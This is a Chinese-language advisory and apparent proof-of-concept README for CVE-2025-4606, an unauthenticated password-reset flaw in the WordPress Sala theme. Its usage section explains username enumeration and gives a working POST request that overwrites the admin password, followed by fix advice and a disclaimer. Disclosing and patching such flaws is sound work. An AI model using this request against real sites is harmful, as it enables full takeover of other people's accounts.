CVE-2025-4606- WordPress Sala主题 <= 1.1.4 - 通过密码重置/账户接管实现未授权权限提升
🔥 漏洞摘要
WordPress Sala主题版本<=1.1.4存在未授权权限提升漏洞。该漏洞允许未认证攻击者通过直接调用暴露的AJAX端点来重置任意用户(包括管理员)的密码,而无需验证请求者身份。
此漏洞源于注册到wp_ajax_nopriv_的change_password_ajax函数,该函数为任何有效用户登录设置新密码,而不检查请求是否经过授权。
🔍 受影响主题
- 主题名称: Sala – Startup & SaaS WordPress主题
- 受影响版本: <= 1.1.4
- 漏洞类型: 未授权权限提升
- CVE ID: CVE-2025-4606
- CVSS评分: 9.8(严重)
- 影响: 完全账户接管(包括管理员)
🧪 漏洞利用特性
- 🔓 无需身份验证
- 🔄 通过提供有效登录名覆盖任何用户的密码
- 📬 目标AJAX端点
/wp-admin/admin-ajax.php?action=change_password_ajax - 🧠 如果攻击者知道有效用户名(如admin)则可立即生效
🧠 研究人员
- 致谢:Thai An
🚀 使用方法
-
识别目标WordPress网站上的有效用户名。您可以通过以下方式检查:
- 公共作者存档URL(
/author/username)
- 公共作者存档URL(
-
构造以下POST请求来重置用户密码:
1 2 3 4 5POST /wp-admin/admin-ajax.php HTTP/1.1 Host: targetsite.com Content-Type: application/x-www-form-urlencoded action=change_password_ajax&login=admin&new_password=hacked123 -
如果成功,您现在可以使用新密码(上例中为
hacked123)以目标用户身份登录。 -
访问
/wp-login.php并验证访问权限。
🛠 修复建议
- 主题开发者应移除或保护
wp_ajax_nopriv_change_password_ajax钩子。 - 在执行敏感操作前,始终检查
is_user_logged_in()并验证用户身份。 - 实施nonce检查以防止CSRF和未授权滥用。
🔒 免责声明:
此信息仅用于教育和授权的渗透测试目的。未经授权利用系统是非法的且不道德的。
📚 参考: